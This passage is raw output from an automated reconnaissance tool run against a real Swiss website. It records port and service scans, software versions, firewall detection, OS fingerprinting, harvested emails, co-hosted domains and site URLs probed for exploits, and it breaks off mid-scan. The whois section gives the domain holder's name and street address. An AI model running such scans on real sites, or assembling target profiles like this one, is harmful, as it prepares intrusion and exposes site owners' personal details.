787. francmaconnerie.ch. 21599 IN TXT "v=spf1 include:spf.infomaniak.ch ?all"
788. francmaconnerie.ch. 21599 IN MX 5 mta-gw.infomaniak.ch.
789. francmaconnerie.ch. 21599 IN A 93.88.240.208
790. francmaconnerie.ch. 21599 IN NS ns6.infomaniak.ch.
791. francmaconnerie.ch. 21599 IN NS ns5.infomaniak.ch.
792.  
793.  
794.  
795.  
796. S U B N E T C A L C U L A T I O N
797. ====================================
798.  
799. Address = 93.88.240.208
800. Network = 93.88.240.208 / 32
801. Netmask = 255.255.255.255
802. Broadcast = not needed on Point-to-Point links
803. Wildcard Mask = 0.0.0.0
804. Hosts Bits = 0
805. Max. Hosts = 1 (2^0 - 0)
806. Host Range = { 93.88.240.208 - 93.88.240.208 }
807.  
808.  
809.  
810. N M A P P O R T S C A N
811. ============================
812.  
813.  
814. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-07 16:23 UTC
815. Nmap scan report for francmaconnerie.ch (93.88.240.208)
816. Host is up (0.099s latency).
817. rDNS record for 93.88.240.208: imu215.infomaniak.ch
818. PORT STATE SERVICE VERSION
819. 21/tcp open ftp ProFTPD 1.3.4e
820. 22/tcp filtered ssh
821. 23/tcp filtered telnet
822. 25/tcp filtered smtp
823. 80/tcp open http Apache httpd
824. 110/tcp filtered pop3
825. 143/tcp filtered imap
826. 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
827. 445/tcp filtered microsoft-ds
828. 3389/tcp filtered ms-wbt-server
829. Service Info: OS: Unix
830.  
831. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
832. Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
833. [!] IP Address : 93.88.240.208
834. [!] Server: Apache
835. [-] Clickjacking protection is not in place.
836. [!] www.francmaconnerie.ch doesn't seem to use a CMS
837. [+] Honeypot Probabilty: 0%
838. ----------------------------------------
839. PORT STATE SERVICE VERSION
840. 21/tcp open ftp ProFTPD 1.3.4e
841. 22/tcp filtered ssh
842. 23/tcp filtered telnet
843. 25/tcp filtered smtp
844. 80/tcp open http Apache httpd
845. 110/tcp filtered pop3
846. 143/tcp filtered imap
847. 443/tcp open ssl/http Apache httpd
848. 445/tcp filtered microsoft-ds
849. 3389/tcp filtered ms-wbt-server
850. ----------------------------------------
851.  
852. [+] DNS Records
853. ns5.infomaniak.ch. (84.16.66.68) AS29222 Infomaniak Network SA Switzerland
854. ns6.infomaniak.ch. (84.16.67.68) AS29222 Infomaniak Network SA Switzerland
855.  
856. [+] MX Records
857. 5 (83.166.132.48) AS29222 Infomaniak Network SA Switzerland
858.  
859. [+] Host Records (A)
860. www.francmaconnerie.chHTTP: (imu215.infomaniak.ch) (93.88.240.208) AS29222 Infomaniak Network SA Switzerland
861.  
862. [+] TXT Records
863. "v=spf1 include:spf.infomaniak.ch ?all"
864.  
865. [+] DNS Map: https://dnsdumpster.com/static/map/francmaconnerie.ch.png
866.  
867. [>] Initiating 3 intel modules
868. [>] Loading Alpha module (1/3)
869. [>] Beta module deployed (2/3)
870.  
871. Target: http://francmaconnerie.ch
872.  
873. Server: Apache
874.  
875.  
876. ## Checking if the target has deployed an Anti-Scanner measure
877.  
878. [!] Scanning Passed ..... OK
879.  
880.  
881. ## Detecting Joomla! based Firewall ...
882.  
883. [!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
884. [!] The vulnerability probing may be logged and protected.
885.  
886. [!] A Joomla! J-Firewall (com_jfw) is detected.
887. [!] The vulnerability probing may be logged and protected.
888.  
889. [!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
890. [!] The vulnerability probing may be logged and protected.
891.  
892. [!] A SecureLive Joomla! firewall is detected.
893. [!] The vulnerability probing may be logged and protected.
894.  
895. [!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
896. [!] It is likely that webmaster routinely checks insecurities.
897.  
898. [!] A security scanner (com_securityscanner/com_securityscan) is detected.
899.  
900. [!] A Joomla! GuardXT Security Component is detected.
901. [!] It is likely that webmaster routinely checks for insecurities.
902.  
903. [!] A Joomla! JoomSuite Defender is detected.
904. [!] The vulnerability probing may be logged and protected.
905.  
906. [!] .htaccess shipped with Joomla! is being deployed for SEO purpose
907. [!] It contains some defensive mod_rewrite rules
908. [!] Payloads that contain strings (mosConfig,base64_encode,<script>
909. GLOBALS,_REQUEST) wil be responsed with 403.
910.  
911. [92m====================================================================================
912.  RUNNING NSLOOKUP 
913. ====================================================================================
914. Server: 192.168.1.254
915. Address: 192.168.1.254#53
916.  
917. Non-authoritative answer:
918. Name: francmaconnerie.ch
919. Address: 93.88.240.208
920.  
921. francmaconnerie.ch has address 93.88.240.208
922. francmaconnerie.ch mail is handled by 5 mta-gw.infomaniak.ch.
923. ====================================================================================
924.  CHECKING OS FINGERPRINT 
925. ====================================================================================
926.  
927. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
928.  
929. [+] Target is francmaconnerie.ch
930. [+] Loading modules.
931. [+] Following modules are loaded:
932. [x] [1] ping:icmp_ping - ICMP echo discovery module
933. [x] [2] ping:tcp_ping - TCP-based ping discovery module
934. [x] [3] ping:udp_ping - UDP-based ping discovery module
935. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
936. [x] [5] infogather:portscan - TCP and UDP PortScanner
937. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
938. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
939. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
940. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
941. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
942. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
943. [x] [12] fingerprint:smb - SMB fingerprinting module
944. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
945. [+] 13 modules registered
946. [+] Initializing scan engine
947. [+] Running scan engine
948. [-] ping:tcp_ping module: no closed/open TCP ports known on 93.88.240.208. Module test failed
949. [-] ping:udp_ping module: no closed/open UDP ports known on 93.88.240.208. Module test failed
950. [-] No distance calculation. 93.88.240.208 appears to be dead or no ports known
951. [+] Host: 93.88.240.208 is down (Guess probability: 0%)
952. [+] Cleaning up scan engine
953. [+] Modules deinitialized
954. [+] Execution completed.
955. ====================================================================================
956.  GATHERING WHOIS INFO 
957. ====================================================================================
958. whois: This information is subject to an Acceptable Use Policy.
959. See https://www.nic.ch/terms/aup/
960.  
961.  
962. Domain name:
963. francmaconnerie.ch
964.  
965. Holder of domain name:
966. constante et avenir
967. rossier jean-luc
968. rue des bosquets 33
969. CH-1800 Vevey
970. Switzerland
971.  
972. Registrar:
973. Infomaniak Network SA
974.  
975. First registration date:
976. 2002-03-18
977.  
978. DNSSEC:N
979.  
980. Name servers:
981. ns5.infomaniak.ch [2001:1600:0:aaaa::e]
982. ns5.infomaniak.ch [84.16.66.68]
983. ns6.infomaniak.ch [2001:1600:0:aaaa::f]
984. ns6.infomaniak.ch [84.16.67.68]
985. ====================================================================================
986.  GATHERING OSINT INFO 
987. ====================================================================================
988.  
989. *******************************************************************
990. * *
991. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
992. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
993. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
994. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
995. * *
996. * TheHarvester Ver. 2.7 *
997. * Coded by Christian Martorella *
998. * Edge-Security Research *
999. * cmartorella@edge-security.com *
1000. *******************************************************************
1001.  
1002.  
1003. Full harvest..
1004. [-] Searching in Google..
1005. Searching 0 results...
1006. [-] Searching in PGP Key server..
1007. [-] Searching in Bing..
1008. Searching 50 results...
1009. [-] Searching in Exalead..
1010. Searching 50 results...
1011.  
1012.  
1013. [+] Emails found:
1014. ------------------
1015. info@francmaconnerie.ch
1016.  
1017. [+] Hosts found in search engines:
1018. ------------------------------------
1019. [-] Resolving hostnames IPs...
1020. 93.88.240.208:www.francmaconnerie.ch
1021. [+] Virtual hosts:
1022. ==================
1023. 93.88.240.208 www.alistairscott.com
1024. 93.88.240.208 www.seatpassion.com
1025. 93.88.240.208 www.guenat-creations.com
1026. 93.88.240.208 www.espoir.ch
1027. 93.88.240.208 www.driveinautoecole.ch
1028. 93.88.240.208 numeriservosphotos.com
1029. 93.88.240.208 www.hotel-edirol.ch
1030. 93.88.240.208 www.lapaix.org
1031. 93.88.240.208 www.guidepechemouchepoencet.com
1032. 93.88.240.208 www.haute-voltige.com
1033. 93.88.240.208 www.feeriedunenuit.ch
1034. 93.88.240.208 www.pneuweb.ch
1035. 93.88.240.208 www.angerscyclisme.fr
1036. 93.88.240.208 carnadis.ch
1037. 93.88.240.208 www.inlinguaneuchatel.ch
1038. 93.88.240.208 www.lefilondesanciens.com
1039. 93.88.240.208 www.arc-loc.ch
1040. 93.88.240.208 chateaudelarive.ch
1041. 93.88.240.208 www.ain-genealogie.fr
1042.  
1043. ******************************************************
1044. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
1045. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
1046. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
1047. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
1048. * |___/ *
1049. * Metagoofil Ver 2.2 *
1050. * Christian Martorella *
1051. * Edge-Security.com *
1052. * cmartorella_at_edge-security.com *
1053. ******************************************************
1054.  
1055. [-] Starting online search...
1056.  
1057. [-] Searching for doc files, with a limit of 25
1058. Searching 100 results...
1059. Results: 0 files found
1060. Starting to download 25 of them:
1061. ----------------------------------------
1062.  
1063.  
1064. [-] Searching for pdf files, with a limit of 25
1065. Searching 100 results...
1066. Results: 0 files found
1067. Starting to download 25 of them:
1068. ----------------------------------------
1069.  
1070.  
1071. [-] Searching for xls files, with a limit of 25
1072. Searching 100 results...
1073. Results: 0 files found
1074. Starting to download 25 of them:
1075. ----------------------------------------
1076.  
1077.  
1078. [-] Searching for csv files, with a limit of 25
1079. Searching 100 results...
1080. Results: 0 files found
1081. Starting to download 25 of them:
1082. ----------------------------------------
1083.  
1084.  
1085. [-] Searching for txt files, with a limit of 25
1086. Searching 100 results...
1087. Results: 0 files found
1088. Starting to download 25 of them:
1089. ----------------------------------------
1090.  
1091. processing
1092. user
1093. email
1094.  
1095. [+] List of users found:
1096. --------------------------
1097.  
1098. [+] List of software found:
1099. -----------------------------
1100.  
1101. [+] List of paths and servers found:
1102. ---------------------------------------
1103.  
1104. [+] List of e-mails found:
1105. ----------------------------
1106. ====================================================================================
1107.  GATHERING DNS INFO 
1108. ====================================================================================
1109.  
1110. ; <<>> DiG 9.11.2-5-Debian <<>> -x francmaconnerie.ch
1111. ;; global options: +cmd
1112. ;; Got answer:
1113. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 13595
1114. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
1115.  
1116. ;; OPT PSEUDOSECTION:
1117. ; EDNS: version: 0, flags:; udp: 4096
1118. ;; QUESTION SECTION:
1119. ;ch.francmaconnerie.in-addr.arpa. IN PTR
1120.  
1121. ;; AUTHORITY SECTION:
1122. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102543 1800 900 604800 3600
1123.  
1124. ;; Query time: 277 msec
1125. ;; SERVER: 192.168.1.254#53(192.168.1.254)
1126. ;; WHEN: Sun Jan 07 18:46:43 EST 2018
1127. ;; MSG SIZE rcvd: 128
1128.  
1129. dnsenum VERSION:1.2.4
1130. 
1131. ----- francmaconnerie.ch -----
1132. 
1133.  
1134. Host's addresses:
1135. __________________
1136.  
1137. francmaconnerie.ch. 64749 IN A 93.88.240.208
1138. 
1139.  
1140. Name Servers:
1141. ______________
1142.  
1143. ns5.infomaniak.ch. 69500 IN A 84.16.66.68
1144. ns6.infomaniak.ch. 69500 IN A 84.16.67.68
1145. 
1146.  
1147. Mail (MX) Servers:
1148. ___________________
1149.  
1150. mta-gw.infomaniak.ch. 3600 IN A 83.166.132.48
1151. 
1152.  
1153. Trying Zone Transfers and getting Bind Versions:
1154. _________________________________________________
1155.  
1156. 
1157. Trying Zone Transfer for francmaconnerie.ch on ns5.infomaniak.ch ...
1158.  
1159. Trying Zone Transfer for francmaconnerie.ch on ns6.infomaniak.ch ...
1160.  
1161. brute force file not specified, bay.
1162. ====================================================================================
1163.  GATHERING DNS SUBDOMAINS 
1164. ====================================================================================
1165. 
1166. ____ _ _ _ _ _____
1167. / ___| _ _| |__ | (_)___| |_|___ / _ __
1168. \___ \| | | | '_ \| | / __| __| |_ \| '__|
1169. ___) | |_| | |_) | | \__ \ |_ ___) | |
1170. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
1171.  
1172. # Coded By Ahmed Aboul-Ela - @aboul3la
1173.  
1174. [-] Enumerating subdomains now for francmaconnerie.ch
1175. [-] verbosity is enabled, will show the subdomains results in realtime
1176. [-] Searching now in Baidu..
1177. [-] Searching now in Yahoo..
1178. [-] Searching now in Google..
1179. [-] Searching now in Bing..
1180. [-] Searching now in Ask..
1181. [-] Searching now in Netcraft..
1182. [-] Searching now in DNSdumpster..
1183. [-] Searching now in Virustotal..
1184. [-] Searching now in ThreatCrowd..
1185. [-] Searching now in SSL Certificates..
1186. [-] Searching now in PassiveDNS..
1187. ThreatCrowd: www.francmaconnerie.ch
1188. Virustotal: www.francmaconnerie.ch
1189. Bing: www.francmaconnerie.ch
1190. Yahoo: www.francmaconnerie.ch
1191. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-francmaconnerie.ch.txt
1192. [-] Total Unique Subdomains Found: 1
1193. www.francmaconnerie.ch
1194.  
1195.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
1196.  ║ ╠╦╝ ║ ╚═╗╠═╣
1197.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
1198. ====================================================================================
1199.  GATHERING CERTIFICATE SUBDOMAINS 
1200. ====================================================================================
1201. 
1202.  
1203. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-francmaconnerie.ch-full.txt
1204. 
1205. ====================================================================================
1206.  CHECKING FOR SUBDOMAIN HIJACKING 
1207. ====================================================================================
1208. ====================================================================================
1209.  CHECKING EMAIL SECURITY 
1210. ====================================================================================
1211.  
1212. ====================================================================================
1213.  STARTING DOMAIN FLYOVER 
1214. ====================================================================================
1215. ====================================================================================
1216.  STARTING PUBLIC S3 BUCKET SCAN 
1217. ====================================================================================
1218.  
1219.  
1220. ====================================================================================
1221.  PINGING HOST 
1222. ====================================================================================
1223. PING francmaconnerie.ch (93.88.240.208) 56(84) bytes of data.
1224.  
1225. --- francmaconnerie.ch ping statistics ---
1226. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
1227.  
1228.  
1229. ====================================================================================
1230.  RUNNING TCP PORT SCAN 
1231. ====================================================================================
1232.  
1233. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 18:47 EST
1234. Nmap scan report for francmaconnerie.ch (93.88.240.208)
1235. Host is up (0.11s latency).
1236. rDNS record for 93.88.240.208: imu215.infomaniak.ch
1237. Not shown: 469 filtered ports, 1 closed port
1238. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1239. PORT STATE SERVICE
1240. 21/tcp open ftp
1241. 80/tcp open http
1242. 443/tcp open https
1243.  
1244. Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds
1245.  
1246. ====================================================================================
1247.  RUNNING INTRUSIVE SCANS 
1248. ====================================================================================
1249.  + -- --=[Port 21 opened... running tests...
1250.  
1251. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 18:47 EST
1252. Nmap scan report for francmaconnerie.ch (93.88.240.208)
1253. Host is up (0.11s latency).
1254. rDNS record for 93.88.240.208: imu215.infomaniak.ch
1255. Skipping host francmaconnerie.ch (93.88.240.208) due to host timeout
1256. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1257. Nmap done: 1 IP address (1 host up) scanned in 905.08 seconds
1258.  + -- --=[Port 22 closed... skipping.
1259.  + -- --=[Port 23 closed... skipping.
1260.  + -- --=[Port 25 closed... skipping.
1261.  + -- --=[Port 53 closed... skipping.
1262.  + -- --=[Port 79 closed... skipping.
1263.  + -- --=[Port 80 opened... running tests...
1264. ====================================================================================
1265.  CHECKING FOR WAF 
1266. ====================================================================================
1267.  
1268. ^ ^
1269. _ __ _ ____ _ __ _ _ ____
1270. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1271. | V V // o // _/ | V V // 0 // 0 // _/
1272. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1273. <
1274. ...'
1275.  
1276. WAFW00F - Web Application Firewall Detection Tool
1277.  
1278. By Sandro Gauci && Wendel G. Henrique
1279.  
1280. Checking http://francmaconnerie.ch
1281.  
1282. ====================================================================================
1283.  GATHERING HTTP INFO 
1284. ====================================================================================
1285. http://francmaconnerie.ch [ Unassigned]
1286.  
1287.  __ ______ _____ 
1288.  \ \/ / ___|_ _|
1289.  \ /\___ \ | | 
1290.  / \ ___) || | 
1291.  /_/\_|____/ |_| 
1292.  
1293. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
1294. + -- --=[Target: francmaconnerie.ch:80
1295. + -- --=[Port is closed!
1296.  
1297. ====================================================================================
1298.  CHECKING HTTP HEADERS 
1299. ====================================================================================
1300. + -- --=[Checking if X-Content options are enabled on francmaconnerie.ch... 
1301.  
1302. + -- --=[Checking if X-Frame options are enabled on francmaconnerie.ch... 
1303.  
1304. + -- --=[Checking if X-XSS-Protection header is enabled on francmaconnerie.ch... 
1305.  
1306. + -- --=[Checking HTTP methods on francmaconnerie.ch... 
1307.  
1308. + -- --=[Checking if TRACE method is enabled on francmaconnerie.ch... 
1309.  
1310. + -- --=[Checking for META tags on francmaconnerie.ch... 
1311.  
1312. + -- --=[Checking for open proxy on francmaconnerie.ch... 
1313.  
1314. + -- --=[Enumerating software on francmaconnerie.ch... 
1315.  
1316. + -- --=[Checking if Strict-Transport-Security is enabled on francmaconnerie.ch... 
1317.  
1318. + -- --=[Checking for Flash cross-domain policy on francmaconnerie.ch... 
1319.  
1320. + -- --=[Checking for Silverlight cross-domain policy on francmaconnerie.ch... 
1321.  
1322. + -- --=[Checking for HTML5 cross-origin resource sharing on francmaconnerie.ch... 
1323.  
1324. + -- --=[Retrieving robots.txt on francmaconnerie.ch... 
1325.  
1326. + -- --=[Retrieving sitemap.xml on francmaconnerie.ch... 
1327.  
1328. + -- --=[Checking cookie attributes on francmaconnerie.ch... 
1329.  
1330. + -- --=[Checking for ASP.NET Detailed Errors on francmaconnerie.ch... 
1331.  
1332. 
1333. ====================================================================================
1334.  SAVING SCREENSHOTS 
1335. ====================================================================================
1336. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/francmaconnerie.ch-port80.jpg
1337. ====================================================================================
1338.  RUNNING GOOGLE HACKING QUERIES 
1339. ====================================================================================
1340. ====================================================================================
1341.  RUNNING INURLBR OSINT QUERIES 
1342. ====================================================================================
1343.  
1344.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
1345.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
1346.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
1347.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
1348.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
1349.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
1350.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
1351.  
1352. __[ ! ] Neither war between hackers, nor peace for the system.
1353. __[ ! ] http://blog.inurl.com.br
1354. __[ ! ] http://fb.com/InurlBrasil
1355. __[ ! ] http://twitter.com/@googleinurl
1356. __[ ! ] http://github.com/googleinurl
1357. __[ ! ] Current PHP version::[ 7.0.26-1 ]
1358. __[ ! ] Current script owner::[ root ]
1359. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
1360. __[ ! ] Current pwd::[ /usr/share/sniper ]
1361. __[ ! ] Help: php inurlbr.php --help
1362. ------------------------------------------------------------------------------------------------------------------------
1363.  
1364. [ ! ] Starting SCANNER INURLBR 2.1 at [07-01-2018 19:44:41]
1365. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1366. It is the end user's responsibility to obey all applicable local, state and federal laws.
1367. Developers assume no liability and are not responsible for any misuse or damage caused by this program
1368.  
1369. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-francmaconnerie.ch.txt ]
1370. [ INFO ][ DORK ]::[ site:francmaconnerie.ch ]
1371. [ INFO ][ SEARCHING ]:: {
1372. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ve ]
1373.  
1374. [ INFO ][ SEARCHING ]:: 
1375. -[:::]
1376. [ INFO ][ ENGINE ]::[ GOOGLE API ]
1377.  
1378. [ INFO ][ SEARCHING ]:: 
1379. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1380. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.rs ID: 003917828085772992913:gmoeray5sa8 ]
1381.  
1382. [ INFO ][ SEARCHING ]:: 
1383. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1384.  
1385. [ INFO ][ TOTAL FOUND VALUES ]:: [ 20 ]
1386.  
1387. 
1388.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1389. |_[ + ] [ 0 / 20 ]-[19:44:57] [ - ] 
1390. |_[ + ] Target:: [ http://www.francmaconnerie.ch/ ]
1391. |_[ + ] Exploit:: 
1392. |_[ + ] Information Server:: , , IP::0 
1393. |_[ + ] More details:: 
1394. |_[ + ] Found:: UNIDENTIFIED
1395. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1396. 
1397.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1398. |_[ + ] [ 1 / 20 ]-[19:45:02] [ - ] 
1399. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/8 ]
1400. |_[ + ] Exploit:: 
1401. |_[ + ] Information Server:: , , IP::0 
1402. |_[ + ] More details:: 
1403. |_[ + ] Found:: UNIDENTIFIED
1404. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1405. 
1406.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1407. |_[ + ] [ 2 / 20 ]-[19:45:07] [ - ] 
1408. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/3 ]
1409. |_[ + ] Exploit:: 
1410. |_[ + ] Information Server:: , , IP::0 
1411. |_[ + ] More details:: 
1412. |_[ + ] Found:: UNIDENTIFIED
1413. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1414. 
1415.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1416. |_[ + ] [ 3 / 20 ]-[19:45:12] [ - ] 
1417. |_[ + ] Target:: [ http://francmaconnerie.ch/node/18 ]
1418. |_[ + ] Exploit:: 
1419. |_[ + ] Information Server:: , , IP::0 
1420. |_[ + ] More details:: 
1421. |_[ + ] Found:: UNIDENTIFIED
1422. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1423. 
1424.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1425. |_[ + ] [ 4 / 20 ]-[19:45:17] [ - ] 
1426. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/17 ]
1427. |_[ + ] Exploit:: 
1428. |_[ + ] Information Server:: , , IP::0 
1429. |_[ + ] More details:: 
1430. |_[ + ] Found:: UNIDENTIFIED
1431. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1432. 
1433.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1434. |_[ + ] [ 5 / 20 ]-[19:45:22] [ - ] 
1435. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/19 ]
1436. |_[ + ] Exploit:: 
1437. |_[ + ] Information Server:: , , IP::0 
1438. |_[ + ] More details:: 
1439. |_[ + ] Found:: UNIDENTIFIED
1440. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1441. 
1442.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1443. |_[ + ] [ 6 / 20 ]-[19:45:27] [ - ] 
1444. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/6 ]
1445. |_[ + ] Exploit:: 
1446. |_[ + ] Information Server:: , , IP::0 
1447. |_[ + ] More details:: 
1448. |_[ + ] Found:: UNIDENTIFIED
1449. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1450. 
1451.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1452. |_[ + ] [ 7 / 20 ]-[19:45:32] [ - ] 
1453. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/4 ]
1454. |_[ + ] Exploit:: 
1455. |_[ + ] Information Server:: , , IP::0 
1456. |_[ + ] More details:: 
1457. |_[ + ] Found:: UNIDENTIFIED
1458. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1459. 
1460.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1461. |_[ + ] [ 8 / 20 ]-[19:45:37] [ - ] 
1462. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/13 ]
1463. |_[ + ] Exploit:: 
1464. |_[ + ] Information Server:: , , IP::0 
1465. |_[ + ] More details:: 
1466. |_[ + ] Found:: UNIDENTIFIED
1467. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1468. 
1469.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1470. |_[ + ] [ 9 / 20 ]-[19:45:42] [ - ] 
1471. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/1 ]
1472. |_[ + ] Exploit:: 
1473. |_[ + ] Information Server:: , , IP::0 
1474. |_[ + ] More details:: 
1475. |_[ + ] Found:: UNIDENTIFIED
1476. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1477. 
1478.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1479. |_[ + ] [ 10 / 20 ]-[19:45:47] [ - ] 
1480. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/2 ]
1481. |_[ + ] Exploit:: 
1482. |_[ + ] Information Server:: , , IP::0 
1483. |_[ + ] More details:: 
1484. |_[ + ] Found:: UNIDENTIFIED
1485. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1486. 
1487.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1488. |_[ + ] [ 11 / 20 ]-[19:45:52] [ - ] 
1489. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/7 ]
1490. |_[ + ] Exploit:: 
1491. |_[ + ] Information Server:: , , IP::0 
1492. |_[ + ] More details:: 
1493. |_[ + ] Found:: UNIDENTIFIED
1494. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1495. 
1496.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1497. |_[ + ] [ 12 / 20 ]-[19:45:57] [ - ] 
1498. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/20 ]
1499. |_[ + ] Exploit:: 
1500. |_[ + ] Information Server:: , , IP::0 
1501. |_[ + ] More details:: 
1502. |_[ + ] Found:: UNIDENTIFIED
1503. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1504. 
1505.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1506. |_[ + ] [ 13 / 20 ]-[19:46:02] [ - ] 
1507. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/14 ]
1508. |_[ + ] Exploit:: 
1509. |_[ + ] Information Server:: , , IP::0 
1510. |_[ + ] More details:: 
1511. |_[ + ] Found:: UNIDENTIFIED
1512. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1513. 
1514.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1515. |_[ + ] [ 14 / 20 ]-[19:46:07] [ - ] 
1516. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Rudyard Kipling_poeme.pdf ]
1517. |_[ + ] Exploit:: 
1518. |_[ + ] Information Server:: , , IP::0 
1519. |_[ + ] More details:: 
1520. |_[ + ] Found:: UNIDENTIFIED
1521. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1522. 
1523.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1524. |_[ + ] [ 15 / 20 ]-[19:46:12] [ - ] 
1525. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Planche sur La Mort_0.pdf ]
1526. |_[ + ] Exploit:: 
1527. |_[ + ] Information Server:: , , IP::0 
1528. |_[ + ] More details:: 
1529. |_[ + ] Found:: UNIDENTIFIED
1530. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1531. 
1532.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1533. |_[ + ] [ 16 / 20 ]-[19:46:17] [ - ] 
1534. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Planche Etre ou Paraître.pdf ]
1535. |_[ + ] Exploit:: 
